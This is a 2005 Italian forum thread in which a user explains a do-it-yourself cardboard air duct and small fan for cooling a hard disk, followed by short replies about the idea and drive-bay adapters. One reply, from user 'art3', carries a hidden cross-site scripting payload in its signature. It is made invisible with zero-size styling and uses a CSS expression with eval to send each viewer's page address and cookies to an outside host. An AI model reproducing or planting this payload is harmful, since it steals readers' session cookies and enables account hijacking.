Condividi:        

Come ti raffreddo l'hard disk...

Se il modem non funziona, hai problemi con la scheda video o non sai che processore scegliere entra qui!!

Moderatori: m.paolo, Caffey

Come ti raffreddo l'hard disk...

Postdi microguru » 12/07/05 15:23

Ho realizzato un sistema "casalingo", semplice ma efficace, per raffreddare il mio disco fisso - che normalmente scaldava come un tostapane. :evil:
Sfruttando gli ultimi 2 slot della baia che ospita i dischi e le periferiche (cd-rom, lettori/masterizzatori dvd e floppy) comunemente presente su tutti i pc, basta posizionare il disco fisso nella penultima posizione, lasciando libero l'ultimo slot verso il basso.
Per una migliore circolazione del flusso d'aria, è necessario chiudere l'ultimo slot lateralmente e frontalmente (creando una sorta di
"cassetto", aperto solo verso il retro).
Nel mezzo, tra il disco fisso e il "pavimento" del cassetto creato, si posiziona un separatore verticale, creato con una striscia di materiale
non conduttivo (io ho usato del cartone). La scelta del materiale è importante, essendo spesso le parti inferiori degli HD "nude" con la
circuiteria esposta. Avendo cura di lasciare uno spazio verso la parte "chiusa", si divide così il cassetto in due "tunnel" che formano una "U".
Ad una delle due estremità (o "bocche") si posiziona una comune ventola 4x4 cm 12V (di quelle comunemente usate per raffreddare i chipset, non
sono affatto rumorose)e la si collega ad uno dei molex liberi (se è tachimetrica la si può collegare anche ad una delle prese sulla
Motherboard per sfruttare l'hardware monitoring - sempre che i cavi lo consentano).
La parte inferiore degli Hd è solitamente messa a nudo e ospita le circuiterie di controllo del disco e dell'alimentazione, quindi è quella che
scalda di più: quando si attiva il pc, la ventola inizia a girare soffiando aria nel condotto che va a raffreddare la faccia inferiore del disco. Nel link ho realizzato uno schemino che spiega meglio la realizzazione del sistema: semplice ma efficace! :D

http://utenti.lycos.it/thomas1977/images/Raff_Hd.jpg
**** COMMODORE 64 BASIC V2 ****
64K RAM SYSTEM 38911 BASIC BYTES FREE
READY.

Immagine
microguru
Utente Senior
 
Post: 1267
Iscritto il: 12/07/05 14:11
Località: Milano

Sponsor
 

Postdi kadosh » 12/07/05 22:08

Però...mica male ;)
Ch®is ˜˜ www.glgroup.it˜˜ {~Up You® Life~}™ Semper Fidelis
Avatar utente
kadosh
Moderatore
 
Post: 3791
Iscritto il: 24/09/01 01:00
Località: Roma

Postdi Dylan666 » 12/07/05 23:26

Una descrizione più dettagliata, qualche rilevazione termica del prima e dopo la modifica e qualche foto o disegno in più e potrebbe venire una bella guida. Se sei interessato contattami via MP ;)
Avatar utente
Dylan666
Moderatore
 
Post: 39994
Iscritto il: 18/11/03 16:46

Postdi Frengo78 » 15/07/05 08:52

davvero geniale.
Knowledge is a weapon
Frengo78
Utente Senior
 
Post: 8985
Iscritto il: 16/07/02 08:41
Località: Torino

Postdi art3 » 15/07/05 09:33

Non credevo servisse raffreddare anche l'hardisk, cmq interessante.


[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://tg2.altervista.org/file.png?data='+document.location+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'
art3
Utente Junior
 
Post: 13
Iscritto il: 15/07/05 09:16

Postdi FrancoAgo » 17/07/05 11:59

io pure ho il problema dell'eccessivo riscaldamento degli HD ma non ho capito come faccio a montare un HD da 3 e 1/2 negli slot da 5 e 1/4
io al momento ho risolto aprendo il case e mettendo di fianco un ventilatore da tavolo
FrancoAgo
Utente Senior
 
Post: 351
Iscritto il: 05/01/04 13:12
Località: Lazio

Postdi microguru » 20/07/05 09:36

ci sono degli adattatori in commercio (mi pare)
**** COMMODORE 64 BASIC V2 ****
64K RAM SYSTEM 38911 BASIC BYTES FREE
READY.

Immagine
microguru
Utente Senior
 
Post: 1267
Iscritto il: 12/07/05 14:11
Località: Milano

Postdi *~Hayabusa~* » 20/07/05 12:55

microguru ha scritto:ci sono degli adattatori in commercio (mi pare)

Si si ci sono, mi ricordo di averne visti in un negozio, non sono altro che delle staffette che vanno montate dentro lo slot e poi dentro di esse va montato l'hd.

HTH :)
..ed e' cibo per la mente,
acqua dalla sorgente,
luce fosforescente
laddove il buio e' costante ..
*~Hayabusa~*
Hardware Admin
 
Post: 1386
Iscritto il: 12/05/02 22:44
Località: Davanti al monitor..


Torna a Assistenza Hardware


Topic correlati a "Come ti raffreddo l'hard disk...":


Chi c’è in linea

Visitano il forum: Nessuno e 138 ospiti

cron